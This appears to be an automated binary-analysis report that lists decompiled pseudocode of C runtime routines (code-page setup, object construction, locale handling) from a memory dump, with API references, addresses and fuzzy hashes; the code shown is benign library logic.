                            • Instruction ID: 5c61a1f5c2f4ea81dff9db37dc291506d96c6d2a392e1cc6852196393f865b64
                            • Opcode Fuzzy Hash: 14813cfebf3589439f837b406cd231148d80408d4105130fd5dee885f65f10db
                            • Instruction Fuzzy Hash: 73D02B3178132C73C51032D8BC06BEA7E09D700BB1F010572FF1C29182D451445003C1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A0A873, Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                            Download Yara Rule
                            C-Code - Quality: 97%
                            			E00A0A873(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed int _t60;
				signed char _t62;
				signed int _t63;
				signed char* _t71;
				signed char* _t72;
				int _t76;
				signed int _t79;
				signed char* _t80;
				short* _t81;
				int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				int _t92;
				int _t93;
				intOrPtr _t96;
				signed int _t97;

				_t48 =  *0xa1d668; // 0xda86b1c8
				_v8 = _t48 ^ _t97;
				_t96 = _a8;
				_t76 = E00A0A446(__eflags, _a4);
				if(_t76 != 0) {
					_t92 = 0;
					__eflags = 0;
					_t79 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xa1d828)) - _t76;
						if( *((intOrPtr*)(_t51 + 0xa1d828)) == _t76) {
							break;
						}
						_t79 = _t79 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t79;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t76 - 0xfde8;
							if(_t76 == 0xfde8) {
								L23:
								_t60 = _t51 | 0xffffffff;
							} else {
								__eflags = _t76 - 0xfde9;
								if(_t76 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t76 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t76,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xa40854 - _t92; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00A0A4B9(_t96);
												goto L37;
											}
										} else {
											E009FE920(_t92, _t96 + 0x18, _t92, 0x101);
											 *(_t96 + 4) = _t76;
											 *(_t96 + 0x21c) = _t92;
											_t76 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t96 + 8) = _t92;
											} else {
												__eflags = _v22;
												_t71 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t86 = _t71[1];
														__eflags = _t86;
														if(_t86 == 0) {
															goto L16;
														}
														_t89 = _t86 & 0x000000ff;
														_t87 =  *_t71 & 0x000000ff;
														while(1) {
															__eflags = _t87 - _t89;
															if(_t87 > _t89) {
																break;
															}
															 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000004;
															_t87 = _t87 + 1;
															__eflags = _t87;
														}
														_t71 =  &(_t71[2]);
														__eflags =  *_t71;
														if( *_t71 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t72 = _t96 + 0x1a;
												_t85 = 0xfe;
												do {
													 *_t72 =  *_t72 | 0x00000008;
													_t72 =  &(_t72[1]);
													_t85 = _t85 - 1;
													__eflags = _t85;
												} while (_t85 != 0);
												 *(_t96 + 0x21c) = E00A0A408( *(_t96 + 4));
												 *(_t96 + 8) = _t76;
											}
											_t93 = _t96 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00A0A51E(_t76, _t89, _t93, _t96, _t96); // executed
											L37:
											_t60 = 0;
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E009FE920(_t92, _t96 + 0x18, _t92, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xa1d838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t80 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t80[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t90 =  *_t80 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t90 - _t63;
									if(_t90 > _t63) {
										break;
									}
									__eflags = _t90 - 0x100;
									if(_t90 < 0x100) {
										_t31 = _t92 + 0xa1d820; // 0x8040201
										 *(_t96 + _t90 + 0x19) =  *(_t96 + _t90 + 0x19) |  *_t31;
										_t90 = _t90 + 1;
										__eflags = _t90;
										_t63 = _t80[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t80 =  &(_t80[2]);
								__eflags =  *_t80;
								if( *_t80 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t92 = _t92 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t96 + 4) = _t76;
					 *(_t96 + 8) = 1;
					 *(_t96 + 0x21c) = E00A0A408(_t76);
					_t81 = _t96 + 0xc;
					_t89 = _v36 + 0xa1d82c;
					_t93 = 6;
					do {
						_t58 =  *_t89;
						_t89 = _t89 + 2;
						 *_t81 = _t58;
						_t81 = _t81 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L36;
				} else {
					E00A0A4B9(_t96);
					_t60 = 0;
				}
				L39:
				return E009FE203(_t60, _v8 ^ _t97);
			}































                            0x00a0a87b
                            0x00a0a882
                            0x00a0a88a
                            0x00a0a892
                            0x00a0a897
                            0x00a0a8a8
                            0x00a0a8a8
                            0x00a0a8aa
                            0x00a0a8ac
                            0x00a0a8ae
                            0x00a0a8b1
                            0x00a0a8b1
                            0x00a0a8b7
                            0x00000000
                            0x00000000
                            0x00a0a8bd
                            0x00a0a8be
                            0x00a0a8c1
                            0x00a0a8c4
                            0x00a0a8c9
                            0x00000000
                            0x00a0a8cb
                            0x00a0a8cb
                            0x00a0a8d1
                            0x00a0a99f
                            0x00a0a99f
                            0x00a0a8d7
                            0x00a0a8d7
                            0x00a0a8dd
                            0x00000000
                            0x00a0a8e3
                            0x00a0a8e7
                            0x00a0a8ed
                            0x00a0a8ef
                            0x00000000
                            0x00a0a8f5
                            0x00a0a8fa
                            0x00a0a900
                            0x00a0a902
                            0x00a0a98c
                            0x00a0a992
                            0x00000000
                            0x00a0a994
                            0x00a0a995
                            0x00000000
                            0x00a0a995
                            0x00a0a908
                            0x00a0a912
                            0x00a0a917
                            0x00a0a91f
                            0x00a0a925
                            0x00a0a926
                            0x00a0a929
                            0x00a0a97c
                            0x00a0a92b
                            0x00a0a92b
                            0x00a0a92f
                            0x00a0a932
                            0x00a0a934
                            0x00a0a934
                            0x00a0a937
                            0x00a0a939
                            0x00000000
                            0x00000000
                            0x00a0a93b
                            0x00a0a93e
                            0x00a0a949
                            0x00a0a949
                            0x00a0a94b
                            0x00000000
                            0x00000000
                            0x00a0a943
                            0x00a0a948
                            0x00a0a948
                            0x00a0a948
                            0x00a0a94d
                            0x00a0a950
                            0x00a0a953
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0a953
                            0x00a0a934
                            0x00a0a955
                            0x00a0a955
                            0x00a0a958
                            0x00a0a95d
                            0x00a0a95d
                            0x00a0a960
                            0x00a0a961
                            0x00a0a961
                            0x00a0a961
                            0x00a0a971
                            0x00a0a977
                            0x00a0a977
                            0x00a0a981
                            0x00a0a984
                            0x00a0a985
                            0x00a0a986
                            0x00a0aa4a
                            0x00a0aa4b
                            0x00a0aa50
                            0x00a0aa51
                            0x00a0aa51
                            0x00a0aa51
                            0x00a0a902
                            0x00a0a8ef
                            0x00a0a8dd
                            0x00a0a8d1
                            0x00000000
                            0x00a0aa53
                            0x00a0a9b1
                            0x00a0a9b9
                            0x00a0a9b9
                            0x00a0a9bd
                            0x00a0a9c0
                            0x00a0a9c6
                            0x00a0a9c9
                            0x00a0a9c9
                            0x00a0a9cc
                            0x00a0a9ce
                            0x00a0a9d0
                            0x00a0a9d0
                            0x00a0a9d3
                            0x00a0a9d5
                            0x00000000
                            0x00000000
                            0x00a0a9d7
                            0x00a0a9da
                            0x00a0a9f6
                            0x00a0a9f6
                            0x00a0a9f8
                            0x00000000
                            0x00000000
                            0x00a0a9df
                            0x00a0a9e5
                            0x00a0a9e7
                            0x00a0a9ed
                            0x00a0a9f1
                            0x00a0a9f1
                            0x00a0a9f2
                            0x00000000
                            0x00a0a9f2
                            0x00000000
                            0x00a0a9e5
                            0x00a0a9fa
                            0x00a0a9fd
                            0x00a0aa00
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a0aa00
                            0x00a0aa02
                            0x00a0aa02
                            0x00a0aa05
                            0x00a0aa06
                            0x00a0aa09
                            0x00a0aa0c
                            0x00a0aa0c
                            0x00a0aa12
                            0x00a0aa15
                            0x00a0aa24
                            0x00a0aa2d
                            0x00a0aa32
                            0x00a0aa38
                            0x00a0aa39
                            0x00a0aa39
                            0x00a0aa3c
                            0x00a0aa3f
                            0x00a0aa42
                            0x00a0aa45
                            0x00a0aa45
                            0x00a0aa45
                            0x00000000
                            0x00a0a899
                            0x00a0a89a
                            0x00a0a8a0
                            0x00a0a8a0
                            0x00a0aa54
                            0x00a0aa63

                            APIs
                              • Part of subcall function 00A0A446: GetOEMCP.KERNEL32(00000000,?,?,00A0A6CF,?), ref: 00A0A471
                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00A0A714,?,00000000), ref: 00A0A8E7
                            • GetCPInfo.KERNEL32(00000000,00A0A714,?,?,?,00A0A714,?,00000000), ref: 00A0A8FA
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CodeInfoPageValid
                            • String ID:
                            • API String ID: 546120528-0
                            • Opcode ID: abfbadca7dcabb9683b5d24bd8c8f949ff1f20141a758a0bd5bbfaf145ffb462
                            • Instruction ID: 4e22a423327d8fc58ed609ace8f6cd43997565c465f5c9455a3b49c0bf70a690
                            • Opcode Fuzzy Hash: abfbadca7dcabb9683b5d24bd8c8f949ff1f20141a758a0bd5bbfaf145ffb462
                            • Instruction Fuzzy Hash: 14515670B0034D5FDB20CF75E881ABBBBF5AF61340F15806ED0968B2D1D6399942CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E1382, Relevance: 3.1, APIs: 2, Instructions: 96COMMON
                            Download Yara Rule
                            C-Code - Quality: 98%
                            			E009E1382(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E009FD870(_t56, _t91);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E009E943C(_t78);
				 *_t89 = 0xa122e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E009E5E99(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E009EC4CA(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E009E151B();
				_t62 = E009E151B();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E009FD82C(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E009EAD1B(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E009FE920(_t87, _t89 + 0x2208, 0, 0x40);
				E009FE920(_t87, _t89 + 0x2248, 0, 0x34);
				E009FE920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}















                            0x009e1382
                            0x009e1382
                            0x009e1382
                            0x009e1382
                            0x009e1382
                            0x009e1387
                            0x009e138a
                            0x009e138c
                            0x009e138f
                            0x009e1396
                            0x009e13a2
                            0x009e13a5
                            0x009e13b0
                            0x009e13b4
                            0x009e13bf
                            0x009e13c5
                            0x009e13cb
                            0x009e13d6
                            0x009e13de
                            0x009e13e2
                            0x009e13e5
                            0x009e13eb
                            0x009e13f1
                            0x009e13f3
                            0x009e1418
                            0x009e13f5
                            0x009e13fa
                            0x009e1400
                            0x009e1403
                            0x009e1409
                            0x009e1414
                            0x009e140b
                            0x009e140d
                            0x009e140d
                            0x009e1409
                            0x009e141b
                            0x009e1427
                            0x009e142e
                            0x009e1435
                            0x009e143e
                            0x009e1449
                            0x009e1453
                            0x009e1459
                            0x009e145f
                            0x009e1465
                            0x009e146b
                            0x009e1471
                            0x009e1477
                            0x009e147e
                            0x009e1484
                            0x009e148a
                            0x009e1490
                            0x009e1496
                            0x009e149c
                            0x009e14ab
                            0x009e14ba
                            0x009e14c5
                            0x009e14cd
                            0x009e14d3
                            0x009e14d9
                            0x009e14df
                            0x009e14e5
                            0x009e14eb
                            0x009e14f1
                            0x009e14fa
                            0x009e1500
                            0x009e1506
                            0x009e150e
                            0x009e1518

                            APIs
                            • __EH_prolog.LIBCMT ref: 009E1382
                              • Part of subcall function 009E5E99: __EH_prolog.LIBCMT ref: 009E5E9E
                              • Part of subcall function 009EC4CA: __EH_prolog.LIBCMT ref: 009EC4CF
                              • Part of subcall function 009EC4CA: new.LIBCMT ref: 009EC512
                              • Part of subcall function 009EC4CA: new.LIBCMT ref: 009EC536
                            • new.LIBCMT ref: 009E13FA
                              • Part of subcall function 009EAD1B: __EH_prolog.LIBCMT ref: 009EAD20
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: ca56bcb7ef09f500cf686a7dcd7a802e6d6e630f742ccc726e50bd5be2cd601d
                            • Instruction ID: c0a1e1b90837b0c6b756cacfaf7d7d69d3e5acf140372cf347f350e20a044df7
                            • Opcode Fuzzy Hash: ca56bcb7ef09f500cf686a7dcd7a802e6d6e630f742ccc726e50bd5be2cd601d
                            • Instruction Fuzzy Hash: 254147B0905B449EE725CF7A8485AE6FBF5FF18300F50492ED5EE83292DB326554CB11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E137D, Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                            Download Yara Rule
                            C-Code - Quality: 98%
                            			E009E137D(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E009FD870(E00A11157, _t91);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E009E943C(_t78);
				 *_t89 = 0xa122e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E009E5E99(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E009EC4CA(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E009E151B();
				_t62 = E009E151B();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E009FD82C(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E009EAD1B(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E009FE920(_t87, _t89 + 0x2208, 0, 0x40);
				E009FE920(_t87, _t89 + 0x2248, 0, 0x34);
				E009FE920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}














                            0x009e137d
                            0x009e137d
                            0x009e137d
                            0x009e137d
                            0x009e1382
                            0x009e1387
                            0x009e138a
                            0x009e138c
                            0x009e138f
                            0x009e1396
                            0x009e13a2
                            0x009e13a5
                            0x009e13b0
                            0x009e13b4
                            0x009e13bf
                            0x009e13c5
                            0x009e13cb
                            0x009e13d6
                            0x009e13de
                            0x009e13e2
                            0x009e13e5
                            0x009e13eb
                            0x009e13f1
                            0x009e13f3
                            0x009e1418
                            0x009e13f5
                            0x009e13fa
                            0x009e1400
                            0x009e1403
                            0x009e1409
                            0x009e1414
                            0x009e140b
                            0x009e140d
                            0x009e140d
                            0x009e1409
                            0x009e141b
                            0x009e1427
                            0x009e142e
                            0x009e1435
                            0x009e143e
                            0x009e1449
                            0x009e1453
                            0x009e1459
                            0x009e145f
                            0x009e1465
                            0x009e146b
                            0x009e1471
                            0x009e1477
                            0x009e147e
                            0x009e1484
                            0x009e148a
                            0x009e1490
                            0x009e1496
                            0x009e149c
                            0x009e14ab
                            0x009e14ba
                            0x009e14c5
                            0x009e14cd
                            0x009e14d3
                            0x009e14d9
                            0x009e14df
                            0x009e14e5
                            0x009e14eb
                            0x009e14f1
                            0x009e14fa
                            0x009e1500
                            0x009e1506
                            0x009e150e
                            0x009e1518

                            APIs
                            • __EH_prolog.LIBCMT ref: 009E1382
                              • Part of subcall function 009E5E99: __EH_prolog.LIBCMT ref: 009E5E9E
                              • Part of subcall function 009EC4CA: __EH_prolog.LIBCMT ref: 009EC4CF
                              • Part of subcall function 009EC4CA: new.LIBCMT ref: 009EC512
                              • Part of subcall function 009EC4CA: new.LIBCMT ref: 009EC536
                            • new.LIBCMT ref: 009E13FA
                              • Part of subcall function 009EAD1B: __EH_prolog.LIBCMT ref: 009EAD20
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: H_prolog
                            • String ID:
                            • API String ID: 3519838083-0
                            • Opcode ID: 5e1d3b02c33a78313090be1b5f609c799de40138ccecdf3b0e821d472e750cd2
                            • Instruction ID: 555c89d66c06d373afdc491137c6f0723e7b269f4e1ddccfd81ded0508434773
                            • Opcode Fuzzy Hash: 5e1d3b02c33a78313090be1b5f609c799de40138ccecdf3b0e821d472e750cd2
                            • Instruction Fuzzy Hash: CB4159B0905B449EE725CF798485AE7FBE5FF18300F404A2ED6EE83292DB326554CB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A0A6B2, Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                            Download Yara Rule
                            C-Code - Quality: 95%
                            			E00A0A6B2(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E00A08516(__ebx, __ecx, __edx);
				E00A0A7D1(__ebx, __ecx, __edx, _t81);
				_t31 = E00A0A446(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t70 = E00A07A8A(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E00A0A873(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00A07847();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xa1db20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0xa1db20) {
								E00A07A50( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0xa1dda0 & 0x00000001;
							if(( *0xa1dda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E00A0A31C(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0xa1dd40; // 0x15425b8
									 *0xa1d814 = _t44;
								}
							}
						}
						L6:
						E00A07A50(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00A07ECC())) = 0x16;
						goto L5;
					}
				}
			}


















                            0x00a0a6b2
                            0x00a0a6bf
                            0x00a0a6c2
                            0x00a0a6ca
                            0x00a0a6d3
                            0x00a0a6d6
                            0x00a0a6dc
                            0x00000000
                            0x00a0a6de
                            0x00a0a6e2
                            0x00a0a6ef
                            0x00a0a6f1
                            0x00a0a6f5
                            0x00a0a6f7
                            0x00a0a727
                            0x00a0a727
                            0x00000000
                            0x00a0a6f9
                            0x00a0a706
                            0x00a0a70c
                            0x00a0a70f
                            0x00a0a714
                            0x00a0a718
                            0x00a0a71a
                            0x00a0a739
                            0x00a0a73d
                            0x00a0a73f
                            0x00a0a73f
                            0x00a0a74a
                            0x00a0a74e
                            0x00a0a74f
                            0x00a0a751
                            0x00a0a754
                            0x00a0a75b
                            0x00a0a760
                            0x00a0a765
                            0x00a0a75b
                            0x00a0a766
                            0x00a0a76c
                            0x00a0a771
                            0x00a0a773
                            0x00a0a776
                            0x00a0a779
                            0x00a0a780
                            0x00a0a782
                            0x00a0a789
                            0x00a0a78e
                            0x00a0a797
                            0x00a0a79c
                            0x00a0a7a2
                            0x00a0a7a4
                            0x00a0a7a9
                            0x00a0a7a9
                            0x00a0a7a2
                            0x00a0a789
                            0x00a0a729
                            0x00a0a72a
                            0x00000000
                            0x00a0a71c
                            0x00a0a721
                            0x00000000
                            0x00a0a721
                            0x00a0a71a

                            APIs
                              • Part of subcall function 00A08516: GetLastError.KERNEL32(?,?,00A03394,?,?,?,00A02E0F,00000050), ref: 00A0851A
                              • Part of subcall function 00A08516: _free.LIBCMT ref: 00A0854D
                              • Part of subcall function 00A08516: SetLastError.KERNEL32(00000000), ref: 00A0858E
                              • Part of subcall function 00A08516: _abort.LIBCMT ref: 00A08594
                              • Part of subcall function 00A0A7D1: _abort.LIBCMT ref: 00A0A803
                              • Part of subcall function 00A0A7D1: _free.LIBCMT ref: 00A0A837
                              • Part of subcall function 00A0A446: GetOEMCP.KERNEL32(00000000,?,?,00A0A6CF,?), ref: 00A0A471
                            • _free.LIBCMT ref: 00A0A72A
                            • _free.LIBCMT ref: 00A0A760
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
